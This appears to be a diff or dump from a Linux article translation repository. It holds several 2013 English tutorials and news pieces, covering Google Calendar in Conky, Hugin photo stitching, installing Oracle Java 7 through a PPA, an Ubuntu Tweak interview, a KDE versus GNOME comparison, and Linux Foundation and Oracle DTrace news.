> ${execpi 300 ~/bin/gcal.sh}
This Conky configuration will display an agenda and two weeks' worth of schedules of your Google Calendar, directly in your desktop theme. The displayed info is updated every 5 minutes.
Now you can activate Conky by running the following.
$ conky
You should see Google Calendar in the right side of your Linux desktop as follows.
Once you verify that Google Calendar shows up correctly, you can set Conky to auto-start every time you log in to your desktop.
### Set up Google Calendar Reminder ###
gcalcli can also send a reminder for any upcoming schedule in your Google Calendar. It uses notify-send command to send desktop notifications. For Google Calendar reminder, you can set up a cron job like the following.
$ crontab -l
> */10 * * * * /usr/local/bin/gcalcli remind
via: http://xmodulo.com/2013/12/integrate-google-calendar-linux-desktop.html
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sources/How to stitch photos together on Linux.md
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sources/How to stitch photos together on Linux.md
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@ -0,0 +1,103 @@
How to stitch photos together on Linux
If you are an avid photographer, you will probably have several stunning panoramic photos in your portfolio. You don't have to be a professional photographer, nor need specialized equipment to create dramatic panoramic pictures. In fact, there are quite a few picture stitch apps (online or offline, desktop or mobile), which can easily create a panoramic view of a scene from two or more overlapping pictures.
In this tutorial, I will explain **how to stitch photos together on Linux**. For that, I am going to use panoramic photo stitching software called [Hugin][1].
Hugin is an open-source (GPLv2) free panorama photo stitching tool. It is available on multiple platforms including Linux, Windows, OS X, and FreeBSD. Being open-source freeware does not mean that Hugin won't match up to other commercial photo stitchers in terms of features and quality. On the contrary, Hugin is extremely powerful, capable of creating a 360-degree panoramic image, and featuring various advanced photometric corrections and optimizations.
### Install Hugin on Linux ###
To install Hugin on Debian, Ubuntu or Linux Mint:
$ sudo apt-get install hugin
To install Hugin on Fedora:
$ sudo yum install hugin
### Launch Hugin ###
Use hugin command to launch Hugin.
$ hugin
The first thing to do is to load photos that you want to stitch together. For that, click on "Load images" button, and load (two or more) pictures to join. It should be obvious, but individual pictures need to be overlapping with each other.
### First Round of Photo Stitching ###
After loading pictures, click on "Align" button for the first round of stitching.
Hugin will then run stitching assistant in a separate window, which analyzes common keypoints (or control points) between photos to combine the photos properly. After analysis is completed, you will see a panorama preview window, which will display panorama preview.
Switch back to the Hugin's main window. Under the "Align" button, you will see the status of photo stitching (i.e., number of control points, mean error). It will also say whether fit is good or bad.
If it says "bad" or "really bad" fit, you can go ahead and fine-tune picture alignment as demonstrated below.
### Add or Remove Control Points ###
In the main Hugin window, go to "Control Points" tab. In this tab, Hugin shows which common control points are used to join multiple photos. It shows a pair of photos in left/right panels, and common key points between them are visualized with small boxes of the same color. You can remove any spurious points, or add new common points by hand. The more accurately matched points there are, the better quality stitching you will get. Also, if matched control points are well spread-out, they will be more helpful (than highly clustered control points).
Using the left/right arrow buttons located at the top-center, find a pair of photos which have least common control points. Given such a pair, try adding more common points by hand as follows.
Click one spot on a left-side photo, and then click on the corresponding identical spot on a right-side photo. Hugin will try to fine-tune the match automatically. Click on "Add" button at the bottom to add the matched pair. Repeat this process to add additional common points.
### Other Optimizations ###
You can also try re-optimization. Either click on "Re-optimize" button in the toolbar, or go to "Optimizer" tab to fine-tune the optimization.
Go back to "Assistant" tab in the main Hugin window, and click on "Align" button again to see if you get a better result.
If the combined panoramic view has a wavy horizon, you can straighten out the horizon. For that, click on "Preview panorama" button in the toolbar.
Then click on "Straighten" button in the Panorama preview window.
Once you are satisfied with the stitch result, you can go ahead, and export it to an image file. For that, go to "Stitcher" tab in the Hugin's main window, and do the following.
Adjust canvas size, and amount of crop. Also, select output format (e.g., TIFF, JPEG, PNG). Finally, click on "Stitch!" button.
You will be asked to save a current project file (*.pto), and then specify output file name for the stitched photo.
It will take a couple of seconds to finalize photo stitch.
Here is the output of my experiment with Hugin. This is a beautiful panoramic view of luxury beach front in Cancun, Mexico. :-)
via: http://xmodulo.com/2013/12/stitch-photos-together-linux.html
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,62 +0,0 @@
icybreaker translating
Insights into top 3 IT skill groups in highest demand
According to our [IT skill sets][1] research, IT skills required by employers of Linux talent can be classified into relatively independent groups. This article focuses on the top three groups of IT skills that were in the highest demand in the last quarter (Jul-Sep 2013) and refer to job advertisements in selected countries, including USA. It turns out that these three groups of IT skills can be linked with Linux related job categories.
It seems that in the last quarter Embedded Devices Developers related skills were in the highest demand by employers of Linux professionals. The second and third skill groups refer to Virtualization Engineering and LAMP Administrator job opportunities, respectively. This article discusses skill requirements for these three types of job listings and provides insights into the dependency structure of pairs of IT skills within the analyzed three groups of skills.
> If you have not read our [IT Skill Sets][1] article it is recommended to familiarize yourself with this article before you start reading the content below. This article is based on the material presented previously in [IT Skill Sets][1], which explains in detail the methodology used in this study.
### October 2013 update to IT skills classification ###
In the IT skill sets article, LinuxCareer.com analyzed the Linux job listings for the period between May and the end of June 2013. We have brought this classification up to date by considering the period of July until the end of September 2013. The percentage of Linux job ads corresponding to ten relatively independent groups of IT skills is displayed in the above bar chart[1]. The following link to the [IT Classification][2] diagram shows how this bar chart was devised based on the classifications. The top three IT skill groups in highest demand are: Embedded Devices Developers with 27% of Linux job market share; Virtualization Engineers with 20% of Linux job market share; and LAMP Administrators with 12% of Linux job market share. In the next three sections of this article we will focus on the identified top 3 IT skill groups and discuss in detail relationships between pairs of skills. For instance, MySQL and PHP are strongly linked and usually required in tandem by employers. Note also that knowledge of Linux is required in every job advertisement taken into account in the study conducted by LinuxCareer.com.
### Embedded Devices Developers and Programmers ###
The first set of skills in the highest demand are skills relevant to Embedded Devices Developers and Programmers. Dependency chart[2] below shows more detail pertaining to relationships between pairs of skills. Specifically, it shows which pairs of skills are most likely to appear together in Linux related job advertisements. For instance, Embedded links strongly to C/C++/C#, which is visualized in the graph by either darker shade of a rectangle in the lower part of the graph or larger portion of the corresponding circles shaded in the upper portion of the graph.
In general, this group of skills can be further split into three segments. These are:
1. **Android, Embedded, C/C++/C# and Java**. This is the core of the skills you need to know if you would like to work in development of embedded devices. It is possible that either C/C++/C# or Java is required by employers, since Java is based to some extend on C/C++/C#. If you have a look at the October’s IT Skills Watch, Java leads as a programming language with the score of 9513 compared with the C/C++/C# score of 5403. Therefore, in general, if you stand before a choice between mastering of C/C++/C# or Java, Java seems to be a better choice. However, according to the graph below, C/C++/C# seems to appear more frequently in the advertisements relevant to Embedded devices. This suggests that, even though Java gets a higher general score in IT Skills Watch, mastering of C/C++/C# rather than Java is required for Embedded Devices Developer positions.
1.** Python, Perl and Bash**. These set of skills are a complementary set of programming and scripting skills. Perl and Python seem to appear often together in job advertisements, however, it is reasonable to assume that these two skills are required alternatively.
1. **Git, Subversion and Jira**. These skills pertain to source code management, debugging and project management. Some knowledge of these skills is certainly an advantage to programming related projects. Currently, the majority of open source development projects and a large number of corporate projects use such software to manage their source code.
### Virtualization Engineers including skills related to data storage and management ###
The second group of skills that are currently in demand are the group of skills relating to job advertisements relevant to Virtualization Engineering job opportunities as illustrated in the dependency chart[2] below. This group can be further divided into two segments. The first segment of skills is Redhat, VMware, vSphere, ESX/ESXi, XenServer and Citrix. These skills are paramount for Virtualization Engineering job opportunities. The second segment of skills are skills relevant to Unix Systems, Data Storage and Management. It appears that these two segments are closely related. It is not a surprise that VMware comes together with ESX/ESXi and vSphere since ESX/ESXi is a computer virtualization product offered by VMware and vSphere is VMware’s cloud computing virtualization operating system. It is also interesting that Redhat has been grouped with VMware and Citrix products. The strong relation of Solaris and AIX could be a consequence of the fact that they are both proprietary Unix Systems and possibly knowledge of either one of them is sufficient.
### LAMP Administrators ###
Finally, the third group of skills is the type of skills required by employers of LAMP administrators exhibited in the dependency chart[2] below. LAMP stands for Linux Apache MySQL and PHP. All these skills are a core for a LAMP administrator. This is a relatively small group of skills that can take you far in your Linux career. In particular, the strong relation of PHP and MySQL suggests that one of these skills cannot come without the other.
### Conclusion ###
In terms of employability and groups of skills relevant to Linux professionals, this article has identified two important points. The first point shows ten groups of IT skills that were identified by clustering analysis of the most frequently appearing IT skills. The second point of this article shows that the highest demand exists for Embedded Devices and Programmers positions as indicated in the Percentage of Linux job ads linked with corresponding skill groups bar chart. This is followed by job advertisements relevant to Virtualisation Engineering positions and LAMP administrator positions. These three skill groups are core Linux related professions in the last quarter analyzed.
### References ###
[1] Percentage of Linux job ads linked with corresponding skill groups created by [GNU R][3]. Relevant package: graphics.
[2] Dependency charts created by [GNU R][3]. Relevant package: corrgram.
via: http://www.linuxcareer.com/insights-into-top-3-it-skills-groups-in-highest-demand
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@ -1,90 +0,0 @@
(translating by whatever1992)
Install Oracle Java 7 in Elementary OS ‘Luna’ Via PPA
**Question**: How can I install Oracle Java 7 in Elemetary OS Luna?
**Answer**: To install Java 7 in Elementary OS Luna follow the steps below:
Since Elementary OS is Ubuntu based we are at liberty to use **WEPUD8 PPA** which has various Java packages in it.
1. Open Terminal.
2. Run the command below to add Java PPA to your repository:
$ sudo add-apt-repository ppa:webupd8team/java
You are about to add the following PPA to your system:
Oracle Java (JDK) Installer (automatically downloads and installs Oracle JDK6 / JDK7 / JDK8). There are no actual Java files in this PPA. More info: http://www.webupd8.org/2012/01/install-oracle-java-jdk-7-in-ubuntu-via.html
Debian installation instructions: http://www.webupd8.org/2012/06/how-to-install-oracle-java-7-in-debian.html
More info: https://launchpad.net/~webupd8team/+archive/java
Press [ENTER] to continue or ctrl-c to cancel adding it
3. Press ENTER to continue
gpg: keyring `/tmp/tmpB5WwDG/secring.gpg' created
gpg: keyring `/tmp/tmpB5WwDG/pubring.gpg' created
gpg: requesting key EEA14886 from hkp server keyserver.ubuntu.com
gpg: /tmp/tmpB5WwDG/trustdb.gpg: trustdb created
gpg: key EEA14886: public key "Launchpad VLC" imported
gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)
4. Now update your system
$ sudo apt-get update
5. Install Java 7 by running the command below:
$ sudo apt-get install oracle-java7-installer
[sudo] password for enock:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
gir1.2-gstreamer-0.10 libilmbase6 libmagickcore4 libmagickwand4 libcdt4
libmagickcore4-extra liblqr-1-0 imagemagick-common libpathplan4 libopenexr6
rsync netpbm libgvc5 libnetpbm10 libgraph4
Use 'apt-get autoremove' to remove them.
The following extra packages will be installed:
gsfonts-x11 java-common
Suggested packages:
default-jre equivs binfmt-support visualvm ttf-baekmuk ttf-unfonts
ttf-unfonts-core ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho
ttf-sazanami-mincho ttf-arphic-uming
The following NEW packages will be installed:
gsfonts-x11 java-common oracle-java7-installer
0 upgraded, 3 newly installed, 0 to remove and 196 not upgraded.
Need to get 88.5 kB of archives.
After this operation, 473 kB of additional disk space will be used.
Do you want to continue [Y/n]?
6. Type **Y** for Yes and Press enter to continue installation.
7. During the installation, you need to agree to the license to continue. Select **OK**.
8. Then Select **Yes** to continue.
9. Now relax for the packages to be downloaded and installed automatically:
7. Installation has been completed successfully. You can now check the version of Java from the Terminal:
$ java -version
java version "1.7.0_45"
Java(TM) SE Runtime Environment (build 1.7.0_45-b18)
Java HotSpot(TM) 64-Bit Server VM (build 24.45-b08, mixed mode)
via: http://www.unixmen.com/install-oracle-java-7-elementary-os-luna-via-ppa/
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,93 +0,0 @@
Interview with Ding Zhou of Ubuntu Tweak
[Ubuntu tweak][1] is a well known application which allows Ubuntu users to tweak various aspects of their system. The founder of the project, Ding Zhou aka Tualatrix Chou, is talking to us about the nature and the usability of Ubuntu Tweak, the relation with Canonical and the future plans of the project. Enjoy
**When did you start using linux and at what point did you decide to develop Ubuntu tweak?**
I started using Linux when I just started my college life at late 2006. I was learning C programming then, a friend recommended that Linux is a great platform to learn programming. So I started my Linux life from the Fedora Core 6. But after just one week I switched to Ubuntu 6.10, because Ubuntu had a better community in China , and also had very good and fast repositories/mirrors. I fall in love with Ubuntu immediately, and switched from Windows in just one week.
After half years’ both happy and hard time with Ubuntu, I realized that Ubuntu was not so friendly for Chinese people, because after a fresh installation, people had to config the font, input method and many others. So I decided to develop an application to help the newbies to easily config Ubuntu.
So at July 2007, I started to develop Ubuntu Tweak. At that point, only for Chinese people, but soon I made Ubuntu Tweak be an international application and released its first version at Sep 2007
**Ubuntu tweak is already a very successful project. Many Ubuntu users use it to tweak various aspects of their system. Tell us a few words about what Ubuntu Tweak can do.**
Ubuntu Tweak can be used to toggle the desktop icon display, set the fonts, enable/disable the user switch, logo.
In the latest version of Ubuntu Tweak (0.6), you can also use it to tweak your Unity desktop.ut and shutdown functions.
You can also use Ubuntu Tweak to cleanup system cruft to free space and make system clean.
**Canonical decides not to include Ubuntu Tweak in their distro by default. What does that mean? Is there some kind of risk for inexperienced users who want to tweak their system using your application?**
That’s right. Because in the previous version of Ubuntu Tweak, it provided a feature to enable the popular PPA, I wasn’t able to ensure all the PPA were safe, so Ubuntu Tweak had some security risks.
As you see, Source Center has been removed since 0.6. But please don’t mix the “include default by Ubuntu” and “put into the repository”, Ubuntu Tweak first should be put into the universal repository, then can be included by default in Ubuntu.
From the bug reports and user feedback, Ubuntu Tweak has became a lot more stable and easy to use than the old versions.
**What kind of support or collaboration (if any) you have from/with Canonical and the Ubuntu developers?**
Of course I received some help from the company, they helped me try to put Ubuntu Tweak into repository. It is still a work in progress.
I also received a lot of help from community, people help to translate, design, test and report bugs, and some of them even submitted patch for it.
**How many people are involved in the development of Ubuntu Tweak?**
If you say “programmer”, I’m the only one. But we have designers: the logo was designed by M.Sharp, Kevin Chou helped to design the mockup UI of Ubuntu Tweak, it became the 0.6. And currently Jeonkwan Chan are helping me polish the UI, it will become 0.7. Anyone can be involved in the development of Ubuntu Tweak, if they like :)
**When Unity came out on 11.04, a lot of Ubuntu users complained about the lack of configurability. What is your opinion on that, and what are the adaptability-configurability that this particular desktop environment can have?**
I’d like a desktop to have adaptability-configurability, that’s the advantage of Linux, isn’t it?
For example, I don’t like the auto-hide feature of Unity Launcher, so I set it to never hide.
Actually, Unity is configurable, the only thing that Unity is missing (through the ccsm) is that you can’t place Launcher to bottom or right – that’s maybe unfriendly for the left-handedness. Hah, just a joke.
As you can see, Ubuntu 12.04 has already added the hide/show toggle, Launcher size setting in system settings, I think Unity will be more configurable in the future.
**In general, do you think that the development of the Unity desktop environment was the right decision for Canonical? Was it something inevitable because of the problematic collaboration they had with the Gnome developers?**
Yes, I think it’s the right decision for Canonical. If you look back three years, when Ubuntu first introduced the Indicator for GNOME Panel, it was a better design than the original GNOME Panel applet. But there’s some problematic collaboration between Canonical and GNOME Developers, so it has never landed in GNOME, until in GNOME 3, the GNOME Shell itself removed the GNOME Panel, and the design of GNOME Shell panel is almost the same as that of the Indicator. If they could share the same API, the desktop Linux world would be better.
So, between the company, community and GNOME, the different opinions for user interface finally made the Unity desktop out.
I think it’s a good thing, at least I like Unity more than GNOME Shell right now.
**Although you are developing an Ubuntu specialized application, I suppose you are using another distro for more advanced users. What is your distro of choice and why?**
Of course, I had played with Fedora, Arch, OpenSUSE, especially with Gentoo, I had been using it for one year long. It’s my second favourite Linux distribution, because it has one of the most advanced package management systems.
But now I only use Ubuntu for desktop and server, I also use Mac OS X. I got many design inspiration from it :)
**Can Ubuntu Tweak, be tweaked or forked or changed a little bit, in order to become useful in other linux distributions like Fedora, or OpenSuse, or Debian? Is the idea of a “Linux Tweak” application that people would choose distro and desktop environment plausible or not?**
Yes, Ubuntu Tweak can be easily adapted to be used under other distributions. Ubuntu Tweak is modular and very easy to hack.
In 2008, I released an “Ubuntu Tweak for Fedora”, but finally I gave up the maintenance of this version cause I should keep focus on Ubuntu, and I also don’t have that much energy.
**So what is the future of Ubuntu Tweak? Maybe Canonical will embrace it making it a default part of their distro, or they could use it to base their own tweaking tool. What do you think and what will be your next steps?**
Of course the future of Ubuntu Tweak will be bright. Hah.
I have already started the process of putting Ubuntu Tweak to the Software Center, it would be easier if users can install Ubuntu Tweak from the Software Center.
Now I’m focusing on developing the 0.7 version, It will be a better polished and well integrated version for Unity desktop than ever before, and it will also introduce some useful new features. I’d like to adapt Ubuntu Tweak to work better under Unity desktop as much as possible.
I plan to release the new version along with Ubuntu 12.04, hope everyone will like it :)
And one more thing to tell, I’ve already joined Canonical, in Beijing, and response for OEM things. Although Ubuntu Tweak is still a personal project and I’m not involved in the development of Ubuntu, I will try to move to the development team when possible :)
**That was great! Thanks Tualatrix.**
via: http://www.unixmen.com/interview-with-ding-zhou-of-ubuntu-tweak/
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sources/Juju ice-cream icon design.md
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sources/Juju ice-cream icon design.md
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Juju ice-cream icon design
Who doesn’t like ice-cream? Here in the design team we sure do! In the last few weeks we’ve been preparing a special Juju demo for the OpenStack Summit in Hong Kong and we’ve created some very ‘tasty’ icons for it. We thought it would be nice to show you how those icons were created, so here’s a little insight on the design process.
### The brief ###
We wanted to replace the normal Juju icons for something a little bit more special in order to explain to people that visited the Ubuntu stand what kind of things Juju can do. We decided to use the idea of an ice-cream with toppings and sauce which you can build in the same way that you can build services in Juju.
The best part of this demo is that people would actually get the ice-cream they had ‘built’ in Juju in real life!
*The Juju interface, with its default icons*
### Finding good concepts ###
The first thing I needed to do was to find good concepts to present ice-creams and toppings in an icon format. Toppings were going to be especially tricky, as they can be very small and therefore hard to make out at small sizes.
I initially sketched and designed some ideas that were using a kind of flat look. This worked well for the ice-cream, but not so much for the toppings — I soon noticed they had to be semi-realistic to be recognisable.
*Initial sketches and designs following a flat and more simplified look*
At a second stage, I added perspective to the icons; it was important that the icons kept the same perspective for consistency.
*Another set of sketches with added perspective*
The shape of the sauce bottles was also something that needed a bit of trial and error. The initial design looked too much like a ketchup bottle, so we’ve decided to try a different approach.
*Before and after shape of the sauce*
For the backgrounds, I chose to use vibrant colours for the ice-cream icons, to contrast with the ice-creams’ monochrome palette, but paler colours for the toppings, as these are already quite colourful.
The amount of detail added to the icons is just enough for what we needed to show and for them to be recognised. I’ve also added larger pieces to the side of the toppings, to make them easier to be identified.
*The Oreo topping icon, with a side of Oreos*
### Working out the detail ###
The Oreo pieces were created from a single biscuit, which I cut into 9 different parts and then distributed in different layers — I guess in a similar way to what happens in real life.
*The 9 pieces used to create the icon*
The clone tool in Inkscape came in handy: repeating the same small set of different pieces made the final SVG file much lighter, and also Inkscape faster.
The whole process took 4 days from brief to final icons, which is quite a tight deadline, but it was a really fun project to work on.
*The final icon set*
via: http://design.canonical.com/2013/11/juju-ice-cream-icon-design/
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KDE vs GNOME: Settings, Apps, Widgets
When it comes to desktop environments, choosing the one that's right for you can be a deeply personal matter. In this article, I'll look into the differences between two of the most popular Linux desktop environments – Gnome and KDE. I’ll explore what each desktop environment offers, comparing their strengths and weaknesses.
###Initial impressions
Upon first encountering the desktop, one can argue that KDE looks more polished than Gnome, and offers a more tech-friendly appearance. Additionally, if you are used to a Windows environment, KDE will feel much more familiar, thanks to the menu and button layout at the bottom of your screen. You can easily locate the K menu, launch programs and find documents with just a few clicks of your mouse.
Another important and familiar benefit with KDE is the easy to use minimize and close buttons with each open document, picture or application. To someone coming from another platform, features this basic might be taken for granted. But considering desktops like Gnome don't offer a true minimize option any longer, it's worth giving KDE props here.
Loading up Gnome 3 for the first time, the desktop might be perceived as a very alien experience if you're coming from another platform. Like classic Gnome, your access to docs and tools are not located at the bottom of your screen. Even stranger for some newbies, the method for closing open windows is – to be kind – "different." In defense of Gnome 3, however, I've found it to be quite a pleasant experience once you get used to this new way of doing things. And the new users I know who have tested Gnome 3 generally felt the same way.
###Widgets and extensions
The divide between the two desktop environments continues to broaden as we dive into the extensions and widgets provided for Gnome and KDE. While both desktops provide additions you can run to further enhance your desktop experience, the lines between them become different in how the desktops handle extended functionality.
KDE takes an interesting approach in that you can group widgets into what are called "Activities." The idea is you can have one Activity with a set number of desktop widgets, that help with specific work-flows.
By contrast, Gnome defines activities with a different approach. Instead of being widget-centric, Gnome makes its Activities more task- and application-based. For example, if I was using multiple apps, switching to the Gnome Activities overview allows you to gain a visualization and immediate access to each task.
###Settings for your desktop
While Gnome has gotten better about providing adequate settings controls from a GUI, KDE remains the reigning king in this space.
With KDE, you can find settings to control nearly every aspect of your desktop experience. Some Linux distributions, such as [OpenSUSE][1], go ever further by tightly integrating their own tools ([YaST][2]) into the KDE settings experience.
With the updates to the Gnome desktop since Gnome 3, I've found the biggest areas where I see KDE offering greater functionality is with ease of access to settings. Gnome tends to put application specific settings into an easy to find area of each application.
But KDE tends to offer greater granular control with their applications. One of my favorite examples is [Kontact][3] vs [Evolution][4]. Both are powerful PIMs for Gnome and KDE. But the difference is that Kontact is a suite of applications bundled with a suite of controls for each app, while Evolution is a single application with limited control. The same can be said of [AmaroK][5] vs [Rhythmbox][6], among other desktop-specific titles.
###File management
When it comes to finding the right file manager for your desktop, both Gnome and KDE do the work for you by providing their own defaults. [Nautilus][7] is the default file manager for Gnome where KDE, offers up [Dolphin][8] as its main offering.
When it comes to desktop environments, choosing the one that's right for you can be a deeply personal matter. In this article, I'll look into the differences between two of the most popular Linux desktop environments – Gnome and KDE. I’ll explore what each desktop environment offers, comparing their strengths and weaknesses.
###Initial impressions
Upon first encountering the desktop, one can argue that KDE looks more polished than Gnome, and offers a more tech-friendly appearance. Additionally, if you are used to a Windows environment, KDE will feel much more familiar, thanks to the menu and button layout at the bottom of your screen. You can easily locate the K menu, launch programs and find documents with just a few clicks of your mouse.
Another important and familiar benefit with KDE is the easy to use minimize and close buttons with each open document, picture or application. To someone coming from another platform, features this basic might be taken for granted. But considering desktops like Gnome don't offer a true minimize option any longer, it's worth giving KDE props here.
Loading up Gnome 3 for the first time, the desktop might be perceived as a very alien experience if you're coming from another platform. Like classic Gnome, your access to docs and tools are not located at the bottom of your screen. Even stranger for some newbies, the method for closing open windows is – to be kind – "different." In defense of Gnome 3, however, I've found it to be quite a pleasant experience once you get used to this new way of doing things. And the new users I know who have tested Gnome 3 generally felt the same way.
Widgets and extensions
The divide between the two desktop environments continues to broaden as we dive into the extensions and widgets provided for Gnome and KDE. While both desktops provide additions you can run to further enhance your desktop experience, the lines between them become different in how the desktops handle extended functionality.
KDE takes an interesting approach in that you can group widgets into what are called "Activities." The idea is you can have one Activity with a set number of desktop widgets, that help with specific work-flows.
By contrast, Gnome defines activities with a different approach. Instead of being widget-centric, Gnome makes its Activities more task- and application-based. For example, if I was using multiple apps, switching to the Gnome Activities overview allows you to gain a visualization and immediate access to each task.
Settings for your desktop
While Gnome has gotten better about providing adequate settings controls from a GUI, KDE remains the reigning king in this space.
With KDE, you can find settings to control nearly every aspect of your desktop experience. Some Linux distributions, such as OpenSUSE, go ever further by tightly integrating their own tools (YaST) into the KDE settings experience.
With the updates to the Gnome desktop since Gnome 3, I've found the biggest areas where I see KDE offering greater functionality is with ease of access to settings. Gnome tends to put application specific settings into an easy to find area of each application.
But KDE tends to offer greater granular control with their applications. One of my favorite examples is Kontact vs Evolution. Both are powerful PIMs for Gnome and KDE. But the difference is that Kontact is a suite of applications bundled with a suite of controls for each app, while Evolution is a single application with limited control. The same can be said of AmaroK vs Rhythmbox, among other desktop-specific titles.
File management
When it comes to finding the right file manager for your desktop, both Gnome and KDE do the work for you by providing their own defaults. Nautilus is the default file manager for Gnome where KDE, offers up Dolphin as its main offering.
Out of the box, I've found Nautilus offers Gnome users a polished, easy to use file management tool that won't overwhelm new Linux users. Flashing over to KDE, however, Dolphin is a highly configurable and not newbie friendly file management solution for those who want tons of control.
Simply looking at the sidebar for each file manager, you'll notice that Nautilus offers up the most straight forward approach to navigation. KDE's Dolphin, however, goes further with features like dates for files last used, and other related options.
If you're an advanced Linux user, you'll likely find yourself gravitating to Dolphin as it offers the most options and control. For those of us who simply want to navigate files without tons of "stuff", Nautilus wins in terms of simplicity.
###Desktop applications
One area that causes some disagreement among Linux enthusiasts is the claim that one desktop offers better default applications than the other. That said, this is certainly the case with Gnome vs KDE.
My findings in this area are that in many areas, Gnome wins without even trying that hard. For example: GIMP, Evince, and Pidgin are all applications that are simply less of a headache to rely on than their KDE counterparts. Kmail is another app that, in my opinion, gives new KDE users a bad taste in their mouths. Apps like this are overly complex and in general, abysmal to use.
On the flip side, there are some worthwhile exceptions in favor of KDE. [Calligra][9] vs [AbiWord][10] is an easy win for KDE, since [LibreOffice][11] isn't "truly" a Gnome specific option. Just because it's often the default suite for many Linux distributions doesn't make it the desktop environment default.
In the end, one of the wonders of Linux is that you can install GTK or Qt libraries and enjoy the benefits of the apps that best meet with your needs. For myself, I've found the Gnome application defaults to be the clear winner in most instances.
Final thoughts
If I ever found myself trapped on an island with only one desktop environment made available to me, it'd have to be Gnome. Even though I enjoy some aspects of KDE more than Gnome, overall I find Gnome is less work to keep up. Too often I’ve found KDE experiencing a messed up configuration or, worse: weird alerts claiming my sound card has disappeared. Under Gnome, I experience none of these problems.
Because I value my time and my sanity, I'll continue to recommend Gnome over KDE; while suggesting some KDE apps when appropriate. To anyone who claims that KDE is easier to use – I'd like to point out that for me, simply learning Gnome's approach to doing things has offered me greater stability in the long run.
Photo courtesy of [Shutterstock][12].
via: http://www.datamation.com/open-source/kde-vs-gnome-settings-apps-widgets-2.html
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Linux Foundation Gains New Cloud, Open Hardware and Gaming Members
> Cloudius Systems, HSA Foundation and Valve have become the newest members of the Linux Foundation, bringing strengths in the open source cloud, open-standard hardware and gaming.
Cloud computing, open-standard hardware and gaming: These are all areas in which the [Linux Foundation][1] has recently forged important new connections, announcing the addition of [Cloudius Systems][2], [HSA Foundation][3] and [Valve Software][4] as the newest members of the organization. Together, these collaborations highlight the continuing dynamism of the open source world, and provide hints into where it is headed next.
The Linux Foundation, a non-profit consortium that promotes the interests of [Linux][6] and related open source projects, detailed the signing-on of these three companies in an [announcement][5] that highlighted the particular strengths they stand to contribute to the open source ecosystem.
First, Cloudius Systems will help to advance the open source cloud. Its major product is [OSv][7], a sleek operating system that the company recently introduced and designed specifically for the cloud. Interestingly, OSv—which runs as a guest virtual machine on top of the open source [KVM][8] and [Xen][9] hypervisors—could be considered a competitor with Linux, which forms the basis for many other cloud-oriented virtualization platforms. But Cloudious's entry into the Linux Foundation is a sign that the future of the open cloud is about more than Linux itself, and that open source innovators recognize that the Linux kernel, which was built for desktops and servers, can only go so far in the cloud.
Meanwhile, the non-profit HSA Foundation aims to advance open hardware standards—a key interest for open source developers whether they focus on desktops, servers, the cloud or mobile. Lack of hardware compatibility due to proprietary, undocumented standards has been a thorn in Linux's side from day one, and investing in collaboration to help overcome that barrier is in the interest of virtually everyone within the open source ecosystem.
Last but not least, Valve, which develops the popular [Steam][10] platform for cloud-based games and other content, injects the Linux world with new energy in the gaming realm, an area that has traditionally been very unwelcoming to Linux users. Valve could be on the forefront of a major shift in open source entertainment that will use the power of the cloud to bring Linux into the mainstream fold—while also promoting Linux as the basis for specialized gaming hardware such as Valve's [Steam Machines][11], home gaming devices that run on Linux.
via: http://thevarguy.com/open-source-application-software-companies/linux-foundation-gains-new-cloud-open-hardware-and-gaming
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Oracle adds DTrace debugger to its Linux distribution
> Oracle Linux administrators can finally take advantage of the powerful DTrace debugging tool that was first designed for Solaris
IDG News Service - Oracle has fully integrated the long-awaited Linux DTrace debugging tool into the latest release of its Linux distribution, potentially allowing administrators and developers to pinpoint the cause of thorny performance issues with more accuracy.
[Oracle Linux][1] 6.5 also includes an updated kernel and support for Linux Containers, allowing a single kernel to power multiple Linux virtual machines on a server.
Much like the CentOS distribution, Oracle Linux is largely a copy of Red Hat Enterprise Linux (RHEL), version 6.5 of which Red Hat released last month. Oracle does include in the package its own kernel -- the core of an OS -- customized for security enhancements, as well as some additional administrative tools. Both the Oracle and Red Hat editions are targeted to enterprise use. (The volunteer-driven CentOS 6.5 distribution [was also recently released][2].)
For the first time, Oracle's customized kernel, Unbreakable Enterprise Kernel Release 3, is installed as the default kernel for the distribution -- the stock RHEL kernel is also included in the package as an alternative. As a result, Oracle Linux now supports the DTrace dynamic tracing framework out of the box, though it still needs to be downloaded separately. Oracle Linux 6.4 [offered][3] users a way to download and install DTrace, though it required changes to the kernel.
Originally developed by Sun Microsystems, which was acquired by Oracle in 2010, DTrace can help developers debug, or trace, problems that occur on a system. Known for its thoroughness in documenting system behavior, the software was originally designed for Sun's Solaris Unix distribution, and administrators have long agitated for a version [to run][4] on Linux as well.
DTrace allows administrators and developers "to get insight into the operating system and understand what is consuming resources," said Markus Flierl, Oracle's Solaris vice president of engineering. The software can not only investigate problems with the OS, but also identify potential problems with applications and the networking stack as well.
"If your customer is complaining that something is running slow, you can go in and see if there is a problem that is happening in your operating system, or if it is in your I/O stack. You will get a full top-to-bottom view, a single pane of glass to see what is happening," Flierl said. Having DTrace on board a server will also allow other Oracle debugging tools, such as those found in the Oracle 12c database, to use the DTrace instrumentations as well, he said.
With the introduction of Linux Containers in Linux Oracle 6.5, users now have another option for virtualizing workloads. In this approach, the server's kernel can drive any number of virtual Linux machines, with each one completely isolated from the others. The Linux Control Groups management software assures that each container is allotted a select amount of memory, CPU and disk I/O resources. Oracle also provides templates for quickly setting up containers.
Other updates in the Oracle Linux package support the latest technologies in InfiniBand networking, file systems, processors and solid state disks.
via: http://www.computerworld.com/s/article/9244564/Oracle_adds_DTrace_debugger_to_its_Linux_distribution?taxonomyId=122
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sources/Our Top 10 Linux Applications of 2013.md
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翻译中 Luox
Our Top 10 Linux Applications of 2013
![2013 – What A Year, Right?](http://www.omgubuntu.co.uk/wp-content/uploads/2013/12/apps1.jpg)
*2013 – What A Year, Right?*
**This time last year we knew nothing of Ubuntu Touch; Canonical attempting to raise $32 million for a cutting-edge smartphone would’ve sounded insane; Mir was a space station while Wayland was the future; and as far as Saucy Salamanders and Trusty Tahrs are concerned, they were nothing but adjunct words on the pages of untroubled thesaurus.**
